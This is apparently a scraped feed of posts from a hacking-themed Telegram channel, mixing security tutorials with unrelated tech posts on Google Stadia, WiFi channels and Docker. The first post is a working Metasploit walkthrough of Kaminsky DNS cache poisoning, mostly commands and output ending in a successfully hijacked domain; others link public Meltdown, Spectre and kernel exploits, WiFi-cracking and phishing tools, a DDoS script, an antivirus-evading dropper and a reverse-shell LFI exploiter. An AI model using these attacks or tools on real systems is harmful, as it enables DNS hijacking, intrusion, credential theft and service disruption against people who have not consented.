UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.4K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Kaminsky DNS Cache Poisoning Flaw Exploit for Domains:

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
=======
# /msf3/msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
dns01.metasploit.com.

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘how do you intercept traffic?
How to position and set up listening equipment?

1) I propose to consider options for the location (connection) of equipment for sniffing in a switched environment (we will consider interception of a wi-fi channel in the next article).
The most convenient way is to install a sniffer directly on the listening host of interest to us.

2) However, some of the traffic that is very useful for research, but not intended for the end device, will be dropped by the network interface and not sent for processing to the system, which means that we will not be able to capture this traffic for further research. This traffic includes broadcast traffic within the operation of the switch.

3) For example, an ARP request is used by hosts to determine the MAC address that corresponds to a specific IP address.

4) Knowing the IP, we send an ARP request in order to match the IP-MAC to all devices within the broadcast domain.

5) However, only the target host is "interested" in receiving such a request; other hosts, as mentioned above, will discard the specified packet.

6) For clarity, using the Cisco Packet racer, consider how a host with an IP address of 192.168.1.2 sends an ARP request to host 192.168.1.4.

Having previously checked that there are no ARP entries on 192.168.1.2 from the word at all with the command arp -a (you can delete them using arp -d), we execute the ping command on 192.168.1.4.

7) Since we do not know the MAC address, we first send an ARP request. The request comes to the switch (cisco 2960), then it is sent to all hosts connected to the switch. After that, host 192.168.1.3 discards the specified one, and 192.168.1.4 responds accordingly.

πŸ¦‘In order to capture all incoming traffic on 192.168.1.3, you need to enable mixed mode of operation on the network interface . The software components Aircrack-ng, Wireshark, tcp dump, etc. allow you to do this.

When it is not possible to place a traffic analyzer on the target host , a hub can help .

In this case, the host under investigation and the traffic analyzer in the same switched network segment are connected to the same hub.

As a result, all incoming and outgoing packets will pass through all ports of the hub.

For example, by sending packets from Host1 to Host2, Hub0 will send them to both the Host2 under investigation and the Sniffer packet sniffer.

Dropping packets by the Sniffer in the picture is due to the disabled mixed mode of the network adapter.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘WIFI CHANNEL SPEED WIFI ?

1) Are you spending money for high-speed Internet and not getting what you expected? Was your WiFi network working fine and now you're suddenly stuck with slow WiFi data rates? Selecting the proper WiFi channel can significantly improve your WiFi coverage and performance.

2) In the 2.4 GHz band, 1, 6, and 11 are the only non-overlapping channels. Selecting one or more of these channels is an important part of setting up your network correctly. Currently, many wireless routers automatically select the channel for you upon initial setup, where depending on your wireless environment, it could lead to slow WiFi speeds and interference.

3) will describe what interference you're dealing with and takes you through the steps to selecting the right channel, so you can understand why you should choose between channel 1, 6, and 11.


Your not allowed to copy our tutorials!
BY METAgeek
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Let's analyse together: Critical vulnerabilities in the architecture of Intel, AMD and ARM processors :

How fortunate that critical vulnerabilities in the architecture of Intel, AMD and ARM processors were published while we were resting.

1) We did not have time to change the equipment, as recommended by US-CERT, as it turned out that it was enough to update the operating systems.

Well, the manufacturers had time to release updates.

2)So, what is the bottom line at the moment.

There are two vulnerabilities - Meltdown ("Crash") and Specter ("Ghost").

3)Meltdown allows you to break the barrier between applications and the internal memory of the operating system, which opens access to the data stored in the memory of the OS.

Detailed description https://meltdownattack.com/meltdown.pdf.

4)Well, there are also exploits, for example: https://github.com/paboldin/meltdown-exploit.

5)Specter breaks memory isolation between applications themselves: conventionally, one service can crawl into the memory of another.

Description https://spectreattack.com/spectre.pdf. They say exploiting the vulnerability is more difficult, but there are still exploits: https://github.com/crozone/SpectrePoC, https://github.com/Eugnis/spectre-attack.

In general, a nightmare! Update, definitely!

Fears about 30% loss of productivity in practice are not justified

Microsoft:

Windows Server 2008 R2 Service Pack 1, Windows 7 Service Pack 1 - KB4056897 or KB4056894
Windows Server 2012 Standard - KB4056899 or KB4056896
Windows 8.1, Windows Server 2012 R2 Standard - KB4056898 or KB4056895
Windows 10 Enterprise - KB4056893
Windows 10 Version 1607, Windows Server 2016 , Windows 10 Mobile - KB4056890
Windows 10 Version 1703 - KB4056891
Windows 10 version 1709 - KB4056892

πŸ¦‘There may be problems installing the patch due to the antivirus.

Provided a list of antiviruses that block the patch: BitDefender, Carbon Black, Cisco, CrowdStrike, Cylance, Cyren, Endgame, Fortinet, G-DATA, McAfee, Nyotron, Palo-Alto, SentinelOne, Sophos, Trend Micro, VIPRE, Webroot.

Modifying or creating the following registry key may help resolve the issue:

?
Key="HKEY_LOCAL_MACHINE"Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat"
Value Name="cadca5fe-87d3-4b96-b7fb-a231484277cc"
Type="REG_DWORD"
Data="0x00000000"
Very short on performance: tests with the Windows 10 update showed a decrease in various performance parameters by 1-2%.

Details: http://www.guru3d.com/articles-pages/windows-vulnerability-cpu-meltdown-patch-benchmarked.html.

Linux:

Everything is simple, you need a kernel 4.14.12, 4.9.75 or 4.4.110. There are no updates for other branches, but they have a bunch of other unpatched vulnerabilities, so they are not recommended for use.

Apple:

Meltdown has been fixed in iOS 11.2, macOS 10.13.2, and tvOS 11.2. No update is required for watchOS.
Specter, Apple claims, is only practically exploitable via JavaScript in a web browser, so they will keep Safari updated. This patch, as well as the Axis Specter patches, are pending.

Google:

Android with the patch from 2018-01-05 is protected.
Chrome 64 adds Specter protection, but is set to release on January 23rd. For now, if you wish, you can enable Site Isolation to protect against attacks.


Your not allowed to copy our tutorials
!@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Everything you need to know about Google Stadia :
#FastTips


1) On June 12, Google fixed one of the main shortcomings of the Stadia service: it is now available on any Android device, whether it is on the official support list or not. In addition, all OnePlus models from OnePlus 5 will support Stadia.

2) To use Stadia on a device without official support, you need to download the Stadia app, open the β€œExperiments” tab, click β€œPlay”. The service should work without problems.

3) Last year Google announced the Stream project. This was a limited test built around Assassin's Creed Odyssey. After a short period of testing in January, the project ended and Google said nothing about its future plans to stream games. Stadia was announced at GDC 2019.

4) The idea of ​​streaming is far from new. However, Google's service may turn out to be one of the most ambitious.

Google Stadia is a game streaming service to any user's device. It can be a TV, smartphone, laptop, tablet. In any case, you will be able to access the most advanced games.

How is this possible? Google servers process the image of the games and broadcast it. The user only needs a device with a screen. This gives everyone access to high quality games with high system requirements. Including those who cannot afford to buy an expensive gaming computer or console.

πŸ¦‘Supported platforms
The cloud service works with a Chromecast Ultra device when connected to a TV. Chrome browser is supported on computers, laptops and tablets, including Chrome OS. Among smartphones, Google Pixel 2, Pixel 3, Pixel 3a and Pixel 4 are supported.

In February, support for the following smartphones appeared:

Samsung Galaxy S8

Samsung Galaxy S8 Plus

Samsung Galaxy S8 Active

Samsung Galaxy Note 8

Samsung Galaxy S9

Samsung Galaxy S9 Plus
..../.......

5) in June it was announced that all Android smartphones will be able to work with Stadia. Even those that are not included in the above list. You can install the Stadia application on them, open the "Experiments" tab and click "Play".

6) Since this is a cloud service, all the heavy processing is done by other people's computers remotely. You can work with a smartphone, tablet or even a weak computer, the quality will be equally high. Users of the service will receive the computing power of a custom AMD 2.7 GHz x86 processor, 16 GB of RAM, data transfer rates up to 484 GB / s and a GPU with a capacity of 10.7 teraflops.

This makes Google's platform more powerful than any game console on the market. In addition, Google will be responsible for updates and users will not have to do anything.

Of course, the quality of the games will depend on your internet connection. Playing on Chromecast Ultra, you can get 4K support with HDR and 5.1 surround sound if you have a TV, sound system, and fast enough internet to support it all.

πŸ¦‘Can I try Stadia for free?

Yes. Google has announced a two-month free trial for Stadia Pro. Any owner of supported devices can play several games on the service for free. They can buy additional games to play and stream. After the trial period ends, you can renew your Stadia Pro subscription for $ 9.99 per month. You can unsubscribe at any time before the end of the trial period.

Your not allowed to copy our tutorials
!@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘WIFI HACKING & TUTORIALS :)

https://www.youtube.com/watch?v=63qZzmGPFLI

https://github.com/FluxionNetwork/fluxion

https://github.com/wifiphisher/wifiphisher
(tutorial https://wifiphisher.org/)

https://www.aircrack-ng.org/

https://www.pcmag.com/how-to/how-to-hack-wi-fi-passwords

https://www.guru99.com/how-to-hack-wireless-networks.html

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘LINUX EXPLOITS :


Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.

Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.

Less probable - additional manual analysis is needed to verify if kernel is affected.

Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

2) Details about LES usage and inner workings:

3) https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:

https://github.com/mzet-/les-res

4) Purpose
LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. It provides following functionality:

Assessing kernel exposure on publicly known exploits
Tool assesses (using heuristics methods discussed in details here) exposure of the given kernel on every publicly known Linux kernel exploit. Example of tool output:

5) $ ./linux-exploit-suggester.sh
...
[+] [CVE-2017-16995] eBPF_verifier

Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

> Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,[ ubuntu=14.04 ]{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04)
> {kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

https://github.com/mzet-/linux-exploit-suggester

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to get rid of SMS Trojans WinLock (Windows Blocker) :

1) "Get Accelerator" (Trojan-Ransom.Win32.Agent.gc)

The first example of a Trojan ransomware that caused a large-scale outbreak was a malicious product self-named "Get Accelerator". It was entered into the Kaspersky Lab database as Trojan-Ransom.Win32.Agent.gc, Dr. The Web calls it "Trojan.Winlock.366" and BitDefender heuristically identified it as "Gen: Trojan.Heur.Hype.cy4@aSUBebjk ".

We saw the first cases of infection with this program around the middle of October last year. By the beginning of the third decade, there was a sharp surge in infection, which, by the way, was repeated towards the end of the year; epidemic outbreaks are clearly visible on the summary graph of search queries, compiled according to the analytical service LiveInternet.

2) "Get Accelerator" was, in essence, one of the primitive representatives of the "ransomware factory" products. The user was presented with a normal application window without controls, which is relatively easy to make in a visual programming environment, with a couple of threatening labels and a timer; in this case, the correct operation of the network connection was disrupted, which did not allow the user to access the Internet.

3) malware consisted of two components - the driver % WinDir% \ dmgr134.sys and the injectable dynamic link library % system32% \ {991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB} .dll; both components were clearly visible in the results of the study of the AVZ system, their names were fixed, which made it possible to draw up standard recommendations for their removal:

To remove a typical Trojan-Ransom.Win32.Agent.gc (Get Accelerator) from a regular home or office PC, you need to execute a script in AVZ:

<div style = "margin: 20px; margin-top: 5px ">
<div class =" smallfont "style =" margin-bottom: 2px "> Code:
<pre class =" alt2 β€³ dir = "ltr" style = "
margin: 0px;
padding: 6px;
border: 1px inset;
width: 640px;
height: 210px;
text-align: left;
overflow: auto "> begin
SearchRootkit (true, true);
SetAVZGuardStatus (true);
QuarantineFile ('% WinDir% \ dmgr134.sys', ");
QuarantineFile ('% System32% \ {991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB} .dll', ");
DeleteFile ('% System32% \ {991F0AD1-DA5D-4dc3-B0BA-F46BA0F1D3CB} .dll');
DeleteFile ('% WinDir% \ dmgr134.sys');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows (true);
end. </pre> The
operating system will reboot.

4) "uFast Download Manager" (Trojan-Ransom.Win32.SMSer.qm, Trojan.Win32.Agent.dapb)

The second representative of the family was the so-called. β€œUFast Download Manager” named β€œTrojan-Ransom.Win32.SMSer.qm” and β€œTrojan.Win32.Agent.dapb” in the databases of Kaspersky Lab and β€œTrojan.Botnetlog.11” - according to Dr. Web; BitDefender re-identified the malware heuristically, naming it "BehavesLike: Trojan.UserStartup".

The attack by this malicious program occurred in early November, when the first wave of Get Accelerator had already been extinguished. An epidemic surge is clearly visible again on the search query graph, although it was not as powerful as in the previous sample.

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘NEW HACKING TOOL LIST

- [cuckoo](https://github.com/cuckoosandbox/cuckoo) - Cuckoo Sandbox is an automated dynamic malware analysis system.[![->](https://img.shields.io/github/stars/cuckoosandbox/cuckoo.svg?style=social&label=Star&maxAge=2592000)](https://github.com/cuckoosandbox/cuckoo/stargazers/)
- [Easymap](https://github.com/Cvar1984/Easymap) - No description provided[![->](https://img.shields.io/github/stars/Cvar1984/Easymap.svg?style=social&label=Star&maxAge=2592000)](https://github.com/Cvar1984/Easymap/stargazers/)
- [Ecode](https://github.com/Cvar1984/Ecode) - Encode / Decode.[![->](https://img.shields.io/github/stars/Cvar1984/Ecode.svg?style=social&label=Star&maxAge=2592000)](https://github.com/Cvar1984/Ecode/stargazers/)
- [Hac](https://github.com/Cvar1984/Hac) - No description provided[![->](https://img.shields.io/github/stars/Cvar1984/Hac.svg?style=social&label=Star&maxAge=2592000)](https://github.com/Cvar1984/Hac/stargazers/)
- [sqlscan](https://github.com/Cvar1984/sqlscan) - Quick SQL Scanner, Dorker, Webshell injector PHP.[![->](https://img.shields.io/github/stars/Cvar1984/sqlscan.svg?style=social&label=Star&maxAge=2592000)](https://github.com/Cvar1984/sqlscan/stargazers/)
- [hammer](https://github.com/cyweb/hammer) - Hammer DDos Script - Python 3.[![->](https://img.shields.io/github/stars/cyweb/hammer.svg?style=social&label=Star&maxAge=2592000)](https://github.com/cyweb/hammer/stargazers/)
- [Kadabra](https://github.com/D35m0nd142/Kadabra) - [DEPRECATED] Kadabra is my automatic LFI Exploiter and Scanner, written in C++ and a couple extern module in Python..[![->](https://img.shields.io/github/stars/D35m0nd142/Kadabra.svg?style=social&label=Star&maxAge=2592000)](https://github.com/D35m0nd142/Kadabra/stargazers/)
- [LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner .[![->](https://img.shields.io/github/stars/D35m0nd142/LFISuite.svg?style=social&label=Star&maxAge=2592000)](https://github.com/D35m0nd142/LFISuite/stargazers/)
- [Clickjacking-Tester](https://github.com/D4Vinci/Clickjacking-Tester) - A python script designed to check if the website if vulnerable of clickjacking and create a poc.[![->](https://img.shields.io/github/stars/D4Vinci/Clickjacking-Tester.svg?style=social&label=Star&maxAge=2592000)](https://github.com/D4Vinci/Clickjacking-Tester/stargazers/)
- [Dr0p1t-Framework](https://github.com/D4Vinci/Dr0p1t-Framework) - A framework that create an advanced stealthy dropper that bypass most AVs and have a lot of tricks.[![->](https://img.shields.io/github/stars/D4Vinci/Dr0p1t-Framework.svg?style=social&label=Star&maxAge=2592000)](https://github.com/D4Vinci/Dr0p1t-Framework/stargazers/)
- [elpscrk](https://github.com/D4Vinci/elpscrk) - A Common User Passwords generator script that looks like the tool Eliot used it in Mr.Robot Series Episode 01 :D :v.[![->](https://img.shields.io/github/stars/D4Vinci/elpscrk.svg?style=social&label=Star&maxAge=2592000)](https://github.com/D4Vinci/elpscrk/stargazers/)
- [SecLists](https://github.com/danielmiessler/SecLists) - SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more..[![->](https://img.shields.io/github/stars/danielmiessler/SecLists.svg?style=social&label=Star&maxAge=2592000)](https://github.com/danielmiessler/SecLists/stargazers/)
- [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script.[![->](https://img.shields.io/github/stars/darkoperator/dnsrecon.svg?style=social&label=Star&maxAge=2592000)]

don't clone our tutorials
βœ…
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Common WEB vulnerabilities and repair suggestions :

1) High-risk vulnerabilities include SQL injection vulnerabilities, XSS cross-site scripting vulnerabilities, source code leaks on pages, backup files on websites, files containing SVN information on websites, and arbitrary file read vulnerabilities in Resin on websites.

2) SQL injection vulnerability: The website program ignores the check of the SQL statement contained in the input string, which makes the SQL statement contained in the database mistakenly regarded as a legal SQL command and run, resulting in various sensitive data in the database being stolen, changed or delete.

3) XSS Cross-Site Scripting Vulnerability: The website program ignores the checking of special characters and strings (such as <>'"<script><iframe>onload) in the input string, allowing an attacker to trick users into visiting pages containing malicious JavaScript code , Causing malicious code to be executed in the user’s browser, resulting in the theft of the target user’s authority or the tampering of data.

4) Source code leakage on the page: The source code leakage on the page may lead to the disclosure of the key logic of the website service and the configured account password. Attackers can use this information to obtain website permissions more easily, leading to the website being hacked.

5) There are backup files on the website: There are backup files on the website, such as database backup files, website source code backup files, etc. Attackers can use this information to obtain website permissions more easily, leading to the website being hacked.

6) There is a file containing SVN information on the website: There is a file containing SVN information on the website, which is a private file of the version controller of the website source code, which contains the address of the SVN service, the private file name submitted, the SVN user name and other information. This information is helpful The attacker has a more comprehensive understanding of the structure of the website and provides help for the attacker to invade the website.

7) Resin arbitrary file reading vulnerability exists in the website: The website installed with certain versions of Resin server has a vulnerability that can read arbitrary files. Attackers can use this vulnerability to read any file content of the website server, causing the website to be hacked.

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘So is the SMS verification code really safe?

1) If it is safe, nothing is really safe, and SMS verification code is not the safest way to verify your identity. The reason why identity verification through SMS can grow wildly within a few years is that it is the lowest cost, easiest and most convenient verification method for secondary verification through SMS.

2) Another reason is that the popularity of mobile phones is also the easiest to be widely used by users. Accept, and the security level of SMS verification is relatively high.

3) Relatively speaking, the security of the secondary identity verification by SMS is relatively high. The difference is that due to the popularity of smart phones, the loopholes in the mobile phone system are also increasing, and the existence of various Trojan horses has led to the emergence of the security of identity verification by SMS. problem. But at present it is still a relatively safe verification method.

πŸ¦‘What kind of threats are mobile SMS verification facing? What kind of response?

1) Since it is the era of smart phones, the biggest threat to mobile phone SMS verification is from SMS Trojans on smart platforms. This type of SMS Trojan horse sends short connection SMS to allow users to download and install the Trojan without their knowledge. When the Trojan horse is installed in the mobile phone, it will reset the user’s property-related application account password and intercept the SMS verification code. Reset the user's account.

2) This is a threat to the user’s SMS verification security, but because of the simplicity of writing, such Trojans have already formed a very complete industry chain. Make Trojans β†’ sell Trojans β†’ rent Trojans β†’ conduct phishing scams β†’ wash after success No. β†’ Transfer of property . This is a huge industrial chain located underground, and because it has derived a series of industries,

3) I won't say much here. Of course, smart platforms have also issued corresponding policies to reduce the incidence of such thefts. For example, after the Android system version 4.4 has tightened the permissions for SMS, most of them still rely on users to increase their vigilance to prevent

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Docker for beginers :

Docker is the world's leading software containerization platform. For different types of penetration testing , we can use Docker to create corresponding environments. With Docker containers, you can put the test environment on a USB flash drive or the cloud.

Β»What is Docker

1) Docker is an open source technology. In software containers, you can create, run, test, and deploy applications. Dcoker allows you to deploy applications quickly, reliably, and stably in any environment.

2) The container has the advantages of being portable, convenient and fast. Using Docker, we can create an image, and then create other environments on the basis of this image. For example, we downloaded Kali Linux as a basic container, but it didn't install the tools we need. We regard it as a basic container, install the required tools on it, and then save it as a new image without affecting the original image.

3) In other words, based on the original image, a container containing forensic tools and Web penetration testing tools can be created.

πŸ¦‘Tools for web penetration testing

W3af-console

SQLMap

Arachni

Nikto

Websploit

Nmap

πŸ¦‘About installation

The installation of Docker depends on the operating system you are using, but now we can find installation packages for most systems in the official warehouse.

example we use the OpenSuse system.

_0x4a0x72@pwned ~ sudo zypper se docker

S | Nome | Resumo | Tipo

–+β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”+————————————————————–+β€”β€”β€”β€”-

| docker | The Linux container runtime | pacote

_0x4a0x72@pwned ~ sudo zypper in docker

After the installation is successful, you must enable and start the service

_0x4a0x72@pwned ~ sudo systemctl enable docker

_0x4a0x72@pwned ~ sudo systemctl start docker

_0x4a0x72@pwned ~ sudo docker info

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁